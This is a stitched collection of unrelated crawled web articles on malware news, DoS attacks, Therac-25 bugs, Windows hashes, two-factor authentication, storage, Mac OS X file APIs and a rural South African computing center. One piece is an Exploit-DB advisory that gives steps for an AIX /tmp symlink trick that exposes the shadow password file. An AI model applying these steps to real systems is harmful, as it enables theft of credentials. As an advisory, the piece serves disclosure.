shallow, but at least we don't have to pick bugs off each other! OK, that was a cheap shot. I apologize to the other Great Apes who are reading this. Seriously, the research raises fascinating questions about whether Great Apes have a higher consciousness, think about the future, are aware of mortality or harbor personal regrets. Now read this:
<urn:uuid:6de36dbe-09e2-4ad8-a513-c0fbb3c6db7b>
CC-MAIN-2017-04
http://www.itworld.com/article/2718225/enterprise-software/if-you-see-a-balding-orangutan-driving-a-red-sports-car--here-s-why.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960462
430
2.71875
3
Like its big cousins Flame and Gauss, miniFlame is designed to steal data and control infected machines. However, rather than casting a wide net, it acts as an in-depth tool. Kaspersky estimates that unlike Flame or Gauss, which had high number of infections, the amount of infections for miniFlame is much smaller, falling between 10 and 20 machines now, and accounting for only 50–60 total number of infections worldwide to date. “The number of infections combined with miniFlame’s info-stealing features and flexible design indicate it was used for extremely targeted cyber-espionage operations, and was most likely deployed inside machines that were already infected by Flame or Gauss,” Alexander Gostev, chief security exper at Kaspersky Lab, said in a research note. Kaspersky originally found miniFlame in July 2012, and identified it as a Flame module. However, a deeper look has revealed that it is an interoperable tool in its own right, capable of being deployed as an independent malicious program that operates as a backdoor designed for data theft and opening up direct access to infected systems by a remote operator. Additional info-stealing capabilities include making screenshots of an infected computer while it’s running a specific program or application in such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or an FTP client. Separately, at the request from miniFlame’s command and control operator, an additional data-stealing module can be sent to an infected system that infects USB drives and uses them to store data that’s collected from infected machines without an internet connection. But, miniFlame can be used as a plug-in for both the Flame and Gauss malware, indicating cooperation between the creators of those two spywares, Kaspersky noted. “Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same cyber-warfare factory,” Gostev said. “miniFlame is a high precision attack tool,” said Gostev. “Most likely it is a targeted cyber-weapon used in what can be defined as the second wave of a cyberattack.” For example, first, Flame or Gauss are used to infect as many devices as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage. Development of miniFlame might have started as early as 2007, Kaspersky said, continuing until the end of 2011, with many variants created. To date, Kaspersky has identified six of these variants, covering two major generations: 4.x and 5.x.
<urn:uuid:5862df71-a7f1-4069-b813-81c7ac98b7d4>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/miniflame-emerges-as-small-highly-targeted-cyber/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958405
595
2.609375
3
source: http://www.securityfocus.com/bid/375/info The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command. Related ExploitsTrying to match CVEs (1): CVE-1999-1405 Trying to match OSVDBs (1): 8017 Other Possible E-DB Search Terms: IBM AIX 4.2.1 snap, IBM AIX
<urn:uuid:97173848-b36d-4d4a-80b9-fc119d3cb22a>
CC-MAIN-2017-04
https://www.exploit-db.com/exploits/19300/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00336-ip-10-171-10-70.ec2.internal.warc.gz
en
0.882907
337
2.921875
3
DoS – Denial of Service attack The concept behind the design of DoS attack is interfering in the normal functions of a server, web site, or other resources of a network. The hackers and even the virus writers can use number of ways in order to get this job done. One of the most common methods is flooding a server with heavy traffic from network so that it becomes difficult to control it. As a result of this heavy traffic it is not possible to carry out the normal functions properly and sometimes this can further lead to server crash. The only difference in case of DDoS attack is that multiple machines are used in order to conduct it. The master and zombie machines are used by hackers or virus writers in order to co-ordinate the attack across the other. These two machines usually exploit an application’s vulnerability on the machine, to install any malicious code like Trojan. DDoS – Distributed Denial of Service attack There is not much difference in DDoS attack and DoS attack as both are designed to create hindrance in the normal functions of a server, web site, or other network resources. In case of DDoS attack the attack takes place with the help of multiple machines which makes it different from DoS attack. Here are the symptoms of denial-of-service attacks: - The performance of the network becomes unusually slow. Such as web sites access and opening of the files - A particular web site becomes unavailable - It becomes difficult to access any web site - Noticeable increase in the number of spam emails received—such kind of DoS attack is referred to as an e-mail bomb The problems due to denial-of-service attacks are not limited to the computer that is being attacked but it also causes troubles to the network ‘branches’ around it. Here is an example, the router’s bandwidth between the LAN and the Internet may be consumed by an attack, and this can spread to the whole network. If the attack takes place on a big scale, then the internet connectivity of the whole geographical region can be affected without the knowledge or intention of attacker and this happens due to incorrect configuration or due to use of weak network infrastructure device. Picture source: cisco.com If you need more about DoS and DDoS attacks, consider this:
<urn:uuid:d678efb0-eb2f-44e3-aabf-93c3ed0d7e38>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/dos-ddos
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00060-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94326
474
3.6875
4
But all software has bugs. For every thousand lines of code developed by commercial software makers or corporate programmers there could be as many as 20 to 30 bugs, according to William Guttman, the director of the SCC, a group of businesses and academic institutions looking for ways to make software more dependable. Many common programs have a million or more lines of code. Sun says its Solaris operating system has more than 10 In a one-million-line piece of code, even if you only have one bug per thousand lines, youre still going to have 1,000 bugs, says Michael Sowers, executive vice president at Software Development Technologies, a software-testing company. In todays software, says Khosla, "you have to assume there are some bugs in the code." Just look back at the first major case of code that killed, in healthcare. The Therac-25 was one of the first "dual-mode" radiation-therapy machines, which meant that it could deliver both electron and photon treatments. Electrons are used to radiate surface areas of the body to kill cancer cells. A photon beam, normally called an X-ray, can be a hundred times more powerful and as a result is used to deliver cancer-killing radiation treatments deeper into the body. According to Prof. Levesons account, the machine was "more compact, more versatile, and arguably easier to use" than its predecessor machine. But, according to Prof. Levesons 1995 book "Safeware" and other accounts, there were a number of flaws in the software that led to the Therac-25 radiation overdoses at health facilities in Marietta, Ga.; Tyler, Texas; Yakima, Wash.; and elsewhere. In all, three people died. One of the problems manifested itself in 1986 when a physicist tried to change machine set-up data-such as radiation dosage and treatment time-that had been keyed into the software. The machine went through a series of steps to set itself up to deliver either electrons or photons and the dosage of the selected beam. As data was given, the machine recorded the information and then followed the instructions. In some cases, however, operators realized while setting up the machine that they had entered an incorrect piece of information. This could be as simple as unintentionally typing in an "X" for an X-ray (or photon) treatment instead of an "E" for an electron treatment. In "fixing" that designation, an operator would move the cursor up to the "treatment mode" line and type in an "E." The monitor displayed the new entry, seemingly telling the operator that the change was made. But in the case of the Therac-25, the software did not accept any changes while going through its eight-second-long set-up sequence. No matter what the screen might show, the software grabbed only the first entry. The second would be ignored. Unaware the changes did not register, operators turned on the beams and delivered X-rays, when they thought they were delivering electrons. According to Levesons account, patients received such incredibly high quantities of radiation that the beams burned their bodies. Patients who should have received anywhere from 100 to 200 rads of radiation were hit instead with 10,000 to 15,000 rads, in just one or two seconds. A thousand rads is a lethal dose. Next Page: How the FDA, and few other U.S. agencies, regulate dangers in software.
<urn:uuid:fbb5d737-2901-4cd4-be50-8d7d0235a184>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Can-Software-Kill/7
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00546-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965204
725
3.078125
3
Significant advances in technology and shifts in economies and culture are bringing about a new age of intelligent tools that are aware, can make sense of their surroundings, and are socially cognizant of the people who are using them. Sentient tools are the next step in the development of computational systems, Smart Cities and environments, autonomous systems, artificial intelligence (AI), Big Data and data mining, and an interconnected system in the Internet of Things (IoT). These tools are “what comes next” and emerge from a base of computational, sensing, and communications technologies that have been advancing over the last 50 years. The "awareness" of these sentient tools is not comparable to a human level of consciousness. They are not meant to mimic, mirror, or replace human interaction. These tools are designed for specific physical and virtual tasks that could be vastly complex but are not meant to replace humans. Conversely, they are meant to work alongside the human labor force. The rise of sentient tools will have a significant impact on the global work force and education, leaving practically no industry unaffected.
<urn:uuid:5752ab90-33e4-46fa-8007-7f35cc80763b>
CC-MAIN-2017-04
http://www.frost.com/sublib/display-market-insight.do?id=296998960
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00180-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936181
220
3.0625
3
When I first became interested in computer security in the late 1990’s everything was about capturing hashes and cracking them using tools like John the Ripper. Now (in 2011), things are much different. Instead of capturing and cracking it’s now popular (and has been for some time) to simply intercept and replay the hashes themselves to become the target user. This page will cover the fundamentals behind performing these types of attacks. What is a Hash? First of all, we’re not using the term hash in any technical sense here, as it has many meanings that are already defined elsewhere. Here we’re talking about Windows–specifically NT–hashes. That being said, a Windows hash is an artifact of prior successful authentication. It is something that is presented to another system to prove that a user or account is valid, i.e. it’s authentication, not authorization (just because you are who you say you are doesn’t mean you’re allowed to do anything). This is the part that gets confusing in Windows; there are many hashes that are used within the operating system, and many of them are quite different from each other. Here are the main ones:
<urn:uuid:51b4e0e3-ce96-4be2-aaee-08bacd381776>
CC-MAIN-2017-04
https://danielmiessler.com/study/windows-hashes/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00180-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963812
252
3.28125
3
Using Instant Messaging as a Support Resource Once a toy for Internet users, instant messaging is gaining acceptance in the workplace. The future of IM will go far beyond the consumer desktop. In this article, we'll look at instant messaging (IM) and its growing use in the workplace. What started out as a toy for the Internet is growing in popularity among business users. Many valid applications for this technology exist in the workplace. How It Works IM is an Internet technology that lets you send and receive text messages, voice messages, file attachments, and other data instantly over the Internet. E-mail is not an instant technology because it sends messages through a server that stores the items until the user retrieves them. Messages arrive in real time using IM because both parties are constantly connected to the network. When you log on to an IM service, the software informs a server that you are online and ready to receive messages. In order to send messages to another user, you select that person's name from a contact list you've built. You then enter your message and click Send. Depending on which service you use, the server either directly relays the message to the recipient or facilitates a direct connection between you and the recipient. There are three methods that IM services use to deliver messages: centralized network, peer-to-peer connection, or a combination of both: - Centralized network--Connects users to each other through a series of servers that form a large network. When a message is sent, servers find the recipient's PC and route the message through the network until it reaches its destination. MSN Messenger uses this method. - Peer-to-peer--Uses a central server to keep track of who is online. Once you log on, the server sends you the IP addresses of everyone on your contact list who is currently logged on. By doing this, messages are sent directly to the recipient without involving a server. This method is faster for sending large files and graphics. ICQ uses this method. - Combination--Uses a centralized network of servers for sending text messages, but establishes a peer-to-peer connection for sending large files and graphics. AIM uses this method.
<urn:uuid:76aa0221-9b80-4453-9596-25e79a627eb8>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/netsysm/article.php/624591/Using-Instant-Messaging-as-a-Support-Resource.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00482-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918337
450
2.78125
3
The problem is that trying to predict future storage use on an application-by-application basis is likely to be doomed to failure and leave a lot of unutilized space. For example, let’s say that Application A “rented” a two-bedroom storage “apartment” but only used one bedroom. That leaves a lot of wasted space. On the other hand, Application B is running out of space in the one-bedroom storage apartment it once thought was more than big enough. Reprovisioning in a typical storage environment is hard. Using an approach called “thin provisioning,” the storage hypervisor offers applications virtual storage “apartments” that provide as much storage as they want – within reason and as long as the overall physical storage is not exceeded. Note that an analogous process occurs with virtual machines on a physical server. The storage hypervisor also decouples storage services from underlying physical media, i.e. disks. What does that mean? A SAN storage system derives its value from both its associated hardware and software. The hardware provides both higher availability – such as no single point of failure – and performance – such as the use of a sophisticated controller cache – to provide differentiation from, say, JBODs. The software provides added value in what are called storage services, such as remote mirroring or replication capabilities, and various forms of snapshots. These capabilities are essential for many tasks, including such data-protection activities as local backup and remote disaster recovery. However, these capabilities are traditionally associated with physical media, such as particular disk LUNs (logical unit numbers). When an application needs to add LUNs or change existing LUNs, the process may not be easy. A storage hypervisor essentially changes the paradigm to data-centric storage services – designed to meet the often rapidly changing requirements of applications/information – rather than media-centric storage services – limited to the characteristics of physical disks, tapes and arrays. That means that in hypervisor-enabled environments, storage services accompany the data and data can easily be moved virtually from one physical instantiation to another. Moreover, it is easier to apply different storage services to different sets of application data; for example, mission-critical data requires greater high availability (HA) requirements for processes such as remote mirroring, as contrasted to year-old e-mails that have to be safely preserved for e-Discovery purposes, but do not have to be instantly retrievable. It should be obvious that life for an administrator utilizing the storage hypervisor schema can be devoted to more value-added tasks since a combination of IBM SVC makes storage virtualization happen, and IBM TPC makes not only managing changes themselves, but also managing at a more granular level, significantly easier. That IBM’s management process can address data on virtual volumes across multiple tiers of storage – including tier 0 SSD flash memory, tier 1 FC/SAS, and tier 2 SATA – across disparate storage systems – such as IBM XIV and DS8300 systems, but also with storage arrays from another vendor – and from site-to-site – with probably some reasonable limitation on distance – is the icing on the cake. Although no cloud is required, a storage hypervisor sounds like an essential good mix-and-stir ingredient for a private, public or hybrid cloud. At IBM Pulse 2012, IBM customer Ricoh testified to benefits, such as cost savings, it had garnered by using IBM-originated storage hypervisor products. That is a type of benefit that most customers would strive to achieve, but IBM likes to use an example that makes data mobility without disruption – i.e., no downtime of applications and their data – even more dramatic than migrating data from one array to another during a technical product refresh. Let’s say that you have one site in the impending path of a major hurricane and another site situated safely outside the potential path of destruction. Let’s say that you have a server hypervisor (such as VMware vSphere for Intel servers and IBM PowerVM for Power servers) and the IBM storage hypervisor platform. With IBM SVC Stretched-cluster – part of the IBM Storage Hypervisor where SVC supports servers and storage at two geographically separate sites – the same data can be accessed at each site, and it also supports the ability to perform a VMware vMotion and IBM PowerVM Live Partition Mobility (LPM) move non-disruptively to end users. Can your sites do that? But wait, there’s more. In moving to a cloud, a services catalog is essential so that users can easily select the services they need, what IT-as-a service is all about. The implementation of a storage hypervisor enables the development of a storage services catalog. IBM believes that each company has roughly 15 different data types – such as e-mail, database, word processing documents and video – that each requires distinctive service levels across four dimensions; capacity efficiency, I/O performance, data access resilience and disaster protection.
<urn:uuid:493ad47d-a614-4305-9010-98c1ee6fde5a>
CC-MAIN-2017-04
http://www.networkcomputing.com/storage/ibm-pulse-2012-new-storage-hypervisor/382094494/page/0/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00390-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948631
1,036
2.859375
3
First, let’s cover the basics. Two-factor authentication (2FA) is where a user’s credentials are made up of two independent factors, such as: - Something you know (PIN, simple password, alpha-numeric password, alpha-numeric password with special characters, secret questions, passphrase); - Something you have (Keyfob token, key, debit card, smartcard, mobile phone); or - Something you are (biometric data, such as fingerprint, retina, iris, face, veins, DNA, voiceprint, hand, typical usage patterns) Admittedly, this is elementary information that many of you reading this already know. Nevertheless, defining the concept from the outset serves to reinforce your previous education. The tried and tested combination used by countless organizations is the hardware keyfob token (something you have) and a secret PIN (something you know). One type is the one-time password (OTP) keyfob, which is typically carried on your key ring and displays a pseudo-random number that changes periodically. The keyfob itself contains an algorithm (a clock or a counter), and a ‘seed record’ used to calculate the pseudo-random number. The user enters this number to prove that they have the token. The server that is authenticating the user must also have a copy of each keyfob’s seed record, the algorithm used, and the correct time. This technology – widely used to secure remote access to corporate networks and data – is nothing new; many of us have been carrying hardware tokens around in our pockets for at least the last 25 years. Back in 1986, mobile phones were the size of briefcases and anything but smart. But technology has moved on, so isn’t it about time to kill off the hardware token? In recent years, authentication vendors have been looking for alternatives: sometimes in response to increasing pressure on costs, but also to increase convenience for the end users of the token devices. Because most enterprise users of 2FA have a smartphone, it would make sense to try and exploit it as one of the factors. “Since we first published our 2009 report on the market for mobile device-based authentication, we have seen a steady rise in the adoption of mobile devices as two-factor authenticators”, says industry expert Alan Goode, founder and managing director of Goode Intelligence. “We estimate that, today, it probably accounts for over 20% of total 2FA sales.” Are Software Tokens the Answer? A software version of the OTP keyfob for smartphones has been available for nearly as long as the concept of the smartphone – remember the Ericsson R380, released in 2000? Me neither, but you could install an RSA Security Software token on it to generate an OTP. This is exactly the same technology as the hardware version. However, instead of carrying around an extra piece of hardware, it uses the smartphone to calculate the OTP from the ‘seed record’ along with the smartphone’s clock and the algorithm contained in software installed on the device, usually in the form of an app. Despite software tokens having been available for more than a decade, it’s only in recent years that we’ve seen organizations starting to replace traditional hardware tokens with software versions. The driving force behind the switch being that, now, most people have a smartphone in their pocket capable of running apps. Software tokens do have some significant advantages over their hardware-based counterparts – for both organizations and end users. For example, you can’t lose a software-based token, feed it to the dog, or put it through the wash. OK, perhaps you can still do all these things with your smartphone, but then it’s just a case of re-provisioning the app. Also, for geographically disperse organizations, they can be sent electronically – no waiting for shipping or battling with reams of customs paperwork just to get that token to the other side of the world. There’s an App for That! The explosion in apps for business use presents a problem for authentication when using a token app on the same device. If you’re using apps on your smartphone to access corporate data and rely on another app on the same device to be the ‘something you have’, is that really two-factor authentication? What if you’ve left your smartphone on the plane, having removed the password so you could watch a movie? You’re now down to just a single factor to gain access to confidential data, and probably regretting setting the other factor – the ‘something you know’ – to ‘1234’ so you could type it easily. Technology could be the answer to this unfortunate scenario. Earlier I discussed software-based tokens on mobile devices, but this just transports last century’s technology to the smartphone. New solutions are now coming to market that don’t rely on ‘something you have’, but can still utilize these mobile devices. “Our research tells us technology vendors are embracing the smartphone to develop new innovative ways to leverage its characteristics for authentication purposes”, says analyst Alan Goode. “Some of these technologies are at an emerging stage and we don’t expect them to be deployed in large numbers in the short term, but they give us an indication of the direction the authentication market will go: smart, agile, flexible solutions that will create strong authentication services that can be embraced by the many, not the privileged.” One evolving area involves employing biometrics on smartphones to authenticate users based on physical attributes or behaviors. This moves the second factor to ‘something you are’ or ‘something about your behavior’. Biometric authentication on smartphones is still in its infancy, but there are several vendors coming up with potential solutions. When we think of biometrics, most think of fingerprints. Most smartphones don’t come with a built-in fingerprint reader, but there are companies producing clever iPhone cases that incorporate fingerprint readers, such as the Tactivo iPhone case. But until these capabilities are built into the phones, they are unlikely to take off due to cost and the added inconvenience of using and managing the extra hardware involved. One biometric that has the potential to work across all types of smartphones is voice, which uses the device’s microphone to capture biometric information. Everyone has a voiceprint that allows them to be uniquely identified. The simplicity of using just the characteristics of your voice to authenticate is very appealing. Vendors, including Nuance – the technical brains behind iPhone’s Siri voice recognition – are beginning to offer toolkits (DragonID) for app vendors that allow them to incorporate this technology into applications. All About Risk What about a technology that could authenticate you silently in the background, and provide a similar level of assurance that you are who you say you are? This is where risk, or contextual-based authentication, comes into play. This technology observes user behavior, how often they authenticate, from where in the world, and from what device to calculate a risk score each time. This combination of multiple factors is very powerful in assessing a user’s identity, and the smartphone is the perfect device to capture the information required. Most have a GPS receiver built in, so they know where you are at all times. “The context of a user’s access request is important when considering risk-based analysis”, explains Bob Tarzey, analyst and director at Quocirca. “Using advanced security intelligence correlations, an access request can be checked against what is going on elsewhere or has gone on recently. A risk score is given based on how much deviation from a normal authentication session there is.” If the score that is generated when a user tries to gain access to their information is within the acceptable level, then the user will be allowed to authenticate with the standard username and password. However, if a user who normally logs in from home each evening in London is suddenly asking to login from China on a Sunday evening, then they will generate a higher score. This higher score would either deny the user access or trigger some other method of authentication, such as an OTP sent to the user’s phone. Securing the App There are significant barriers to the adoption of both biometrics and risk-based authentication technologies on smartphones. Both require that the apps and smartphones have these technologies integrated. This can work when vendors produce integration kits for app developers, and the app developers see the business case for a higher level of security; but this is going to seriously limit the apps that you can allow your users to run. Do you want to be the one that tells the CEO he can’t use the amazing new mind-mapping apps he’s been showing off to everyone because it doesn’t support your authentication technology? No, me neither. The age of Bring Your Own Apps is here – and it’s going to be even more difficult to avoid than Bring Your Own Device. The Token is Dead – Long Live the Token! There’s no doubt that the use of two-factor authentication is expanding and that we rely on smartphones as business tools to get access to sensitive data. While the increased convenience and decreased cost of using the smartphone as the replacement for hardware tokens is a valid approach, unless we move away from the traditional ’something you have’ factor, we’re increasing the risk of our data being compromised. Less security and a cheaper solution might be the right thing for some organizations or users, and that’s fine as long as we acknowledge the risks. However, having explored some of the alternatives that vendors are proposing – including software tokens, biometrics and risk-based authentication – there is no clear winner for exploiting the smartphone as a factor in the authentication experience. Maybe that’s why the hardware token is still going strong. It doesn’t require app developers to rewrite their apps from scratch, and the hard token provides us with the level of security assurance we want and need. We’ve been carrying tokens around for 25 years; I wonder if they’ll make 50? Authentication expert Grant Le Brun heads up the research labs at Signify – an authentication services vendor – that provides a range of 2FA hosted services. Under his direction, the labs provide clear, independent knowledge and expertise of authentication and other related technologies. Prior to this, Le Brun was a systems engineer at Signify and, before that, a technical consultant for Cambridge Assessment, which owns and manages Cambridge University’s three exam boards.
<urn:uuid:b50e4adb-26a0-4e27-ae35-5952b3673263>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/magazine-features/hard-soft-or-smart-evaluating-the-two-factor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00390-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931988
2,225
2.890625
3
The smart card is one of the latest additions to the world of information technology. Similar in size to today's plastic payment card, the smart card has a microprocessor or memory chip embedded in it that, when coupled with a reader, has the processing power to serve many different applications. As an access-control device, smart cards make personal and business data available only to the appropriate users. Another application provides users with the ability to make a purchase or exchange value. Smart cards provide data portability, security and convenience. Memory vs microprocessor Smart cards come in two varieties: memory and microprocessor. Memory cards simply store data and can be viewed as a small floppy disk with optional security. A microprocessor card, on the other hand, can add, delete and manipulate information in its memory on the card. Similar to a miniature computer, a microprocessor card has an input/output port operating system and hard disk with built-in security features. Contact vs contactless Smart cards have two different types of interfaces: contact and contactless. Contact smart cards are inserted into a smart card reader, making physical contact with the reader. However, contactless smart cards have an antenna embedded inside the card that enables communication with the reader without physical contact. A combi card combines the two features with a very high level of security.
<urn:uuid:3d335fc0-20df-4348-a22b-a1a8e3a30ec5>
CC-MAIN-2017-04
http://www.gemalto.com/companyinfo/smart-cards-basics/what
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00539-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915644
269
3.28125
3
Mac OS X has historically supported many different ways of referring to files on disk from within an application. Plain-old paths (e.g., /Users/john/Documents/myfile) are supported at the lowest levels of the operating system. They're simple, predictable, but perhaps not such a great idea to use as the only way an application tracks files. Consider what happens if an application opens a file based on a path string, then the user moves that file somewhere else while it's still being edited. When the application is instructed to save the file, if it only has the file path to work with, it will end up creating a new file in the old location, which is almost certainly not what the user wanted. Classic Mac OS had a more sophisticated internal representation of files that enabled it to track files independent of their actual locations on disk. This was done with the help of the unique file ids supported by HFS/HFS+. The Mac OS X incarnation of this concept is the FSRef data type. Finally, in the modern age, URLs have become the de facto representation for files that may be located somewhere other than the local machine. URLs can also refer to local files, but in that case they have all the same disadvantages as file paths. This diversity of data types is reflected in Mac OS X's file system APIs. Some functions take file path as arguments, some expect opaque references to files, and still others work only with URLs. Programs that use these APIs often spend a lot of their time converting file references from one representation to another. The situation is similar when it comes to getting information about files. There are a huge number of file system metadata retrieval functions at all levels of the operating system, and no single one of them is comprehensive. To get all available information about a file on disk requires making several separate calls, each of which may expect a different type of file reference as an argument. Here's an example Apple provided at WWDC. Opening a single file in the Leopard version of the Preview image viewer application results in: - Four conversions of an FSRef to a file path - Ten conversions of a file path to an FSRef - Twenty-five calls to getattrlist() - Eight calls to stat()/lstat() - Four calls to open()/close() In Snow Leopard, Apple has created a new, unified, comprehensive set of file system APIs built around a single data type: URLs. But these are URL "objects"—namely, the opaque data types NSURL and CFURL, with a toll-free bridge between them—that have been imbued with all the desirable attributes of an FSRef. Apple settled on these data types because their opaque nature allowed this kind of enhancement, and because there are so many existing APIs that use them. URLs are also the most future-proof of all the choices, with the scheme portion providing nearly unlimited flexibility for new data types and access mechanisms. The new file system APIs built around these opaque URL types support caching and metadata prefetching for a further performance boost. There's also a new on-disk representation called a Bookmark (not to be confused with a browser bookmark) which is like a more network-savvy replacement for classic Mac OS aliases. Bookmarks are the most robust way to create a reference to a file from within another file. It's also possible to attach arbitrary metadata to each Bookmark. For example, if an application wants to keep a persistent list of "favorite" files plus some application-specific information about them, and it wants to be resilient to any movement of these files behind its back, Bookmarks are the best tool for the job. I mention all of this not because I expect file system APIs to be all that interesting to people without my particular fascination with this part of the operating system, but because, like Core Text before it, it's an indication of exactly how young Mac OS X really is as a platform. Even after seven major releases, Mac OS X is still struggling to move out from the shadow of its three ancestors: NeXTSTEP, classic Mac OS, and BSD Unix. Or perhaps it just goes to show how ruthlessly Apple's core OS team is driven to replace old and crusty APIs and data types with new, more modern versions. It will be a long time before the benefits of these changes trickle down (or is it up?) to end-users in the form of Mac applications that are written or modified to use these new APIs. Most well-written Mac applications already exhibit most of the desirable behavior. For example, the TextEdit application in Leopard will correctly detect when a file it's working on has moved. Of course, the key modifier here is "well-written." Simplifying the file system APIs means that more developers will be willing to expend the effort—now greatly reduced—to provide such user-friendly behaviors. The accompanying performance boost is just icing on the cake, and one more reason that developers might choose to alter their existing, working application to use these new APIs.
<urn:uuid:16183228-637a-4c3c-b606-38bd97a7f633>
CC-MAIN-2017-04
http://arstechnica.com/apple/2009/08/mac-os-x-10-6/7/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00317-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943579
1,037
2.90625
3
The people of Kgautswane unite to put their land on the technology map. By Cianran Ryan Kgautswane, in South Africas Northern Province, is described as "deep rural." That means it lies beyond the reach of the national electricity and telephone grids, sufficiently remote to place it out of radar range for regional development planners. The electricity grid passes nearby en route to more substantial towns to the north, but Kgautswane is unlikely to have electricity for several years because the state-owned electricity utility considers it a low-priority village. Its community center comprises a dozen 20-foot steel transport containers strung together into a network of rooms and offices. Kgautswane residents have modest expectations of life. The village and its surrounds support a population of about 60,000, most of them subsistence farmers. Like many rural villages in South Africa, a high percentage of able-bodied men and women are forced to seek work elsewhere -- in cities such as Johannesburg or Pretoria, several hundred miles away, or in Lydenburg, the nearest major town, about 50 miles distant. Children are often raised by the grandparents or extended family members who remain behind and rely on financial support from those who leave to seek work elsewhere. The area is well-served by schools. There are some 10 primary- and seven secondary-level schools -- one of these, lying sufficiently close to the grid, has electricity. The rest rely on daylight and candles. Given such handicaps, the people of Kgautswane have learned to be self-reliant. Several years ago, they formed the Integrated Community Building (ICB) program to conceive and implement projects aimed at community improvement. Led by Clara Masinga, the ICB has achieved some commendable successes, one of which is the Kgautswane Information Communication and Technology (ICT) Center, a seemingly modest project comprising no more than an IBM server, three workstations, two uninterruptable power supplies and a color printer/scanner. Power is supplied from a 5,500 watt gas-fuelled generator, which runs 18 hours a day -- such is the demand for the service. There is insufficient juice from the generator to power light bulbs, so visitors are treated to the incongruous spectacle of high-tech computers being operated by candlelight after dark. Another $15,000 would allow the center to purchase a solar-power system capable of switching on electric lights. The center is owned and run by the ICB, with generator fuel paid for by renting the computers to locals who use it to lend a professional touch to business plans or school reports. The center generates income of about $800 a month, but this will increase as new workstations are added. The total cost of the project, including training, was about $44,000. This was partly funded by the World Bank, but similar centers elsewhere in southern Africa were funded by selling naming rights to corporate sponsors. Paul West, director of the Centre for Lifelong Learning at Technikon South Africa, one of the sponsors of the project, says the center is changing life for Kgautswane residents in other ways. "For one, levels of computer literacy have been markedly raised. Most people in Africa will never own a computer in their lifetimes. Therefore, other ways will have to be found to introduce them to the information society. This project is introducing the people of Kgautswane to the information society and bridging the digital divide. "The center has been used more than we initially expected, and as a result there is pressure to add more PCs. The existing level of literacy in Kgautswane underlines the capacity of rural people to accept high-tech solutions and integrate them into their lifestyles." Since the launch of the Kgautswane ICT Center in 1999, the village has become a font of entrepreneurial energy. Typed business plans pour out of the center in search of finance and partners. Teachers are issuing students with professionally presented rather than hand-written papers and committee minutes are now committed to print. Kgautswane has had a crash course in the joys of computing. Eyes on a Prize Such a facility would scarcely raise an eyebrow in developed countries, but it so impressed the Stockholm Challenge judges, which included Government Technology Editor Wayne Hanson, that they decided to make this joint winner in its "Equal Access" category, alongside another South African entry, the Manguzi Wireless Internet project. West says the judges were impressed with the determination of the project coordinators to succeed against all the odds -- no power, telephones, funds or trained personnel. The voltage from the generator fluctuates wildly, making this a tricky undertaking for any supplier: "There are few computer companies willing to take on these kinds of risks," says West. Once the telephone lines reach Kgautswane over the next few years, the center will be able to offer an Internet connection and so broaden the universe of opportunities. There is a rudimentary radio telephone link in Kgautswane, but its poor quality does not permit Internet access. Once the center has a single landline, it will be able to erect a satellite broadcast Internet connection, with outgoing requests for Internet information transmitted by landline and information returned by satellite broadcast, the same method used by the Manguzi Wireless Internet project. West is the driving force behind the creation and maintenance of AfricaEducation.org, a large and growing resource for African students and educators intended to help them bridge the educational divide between Africa and developed countries. This facility will be available to Kgautswane residents once the telephone lines reach here. Another resource operated by 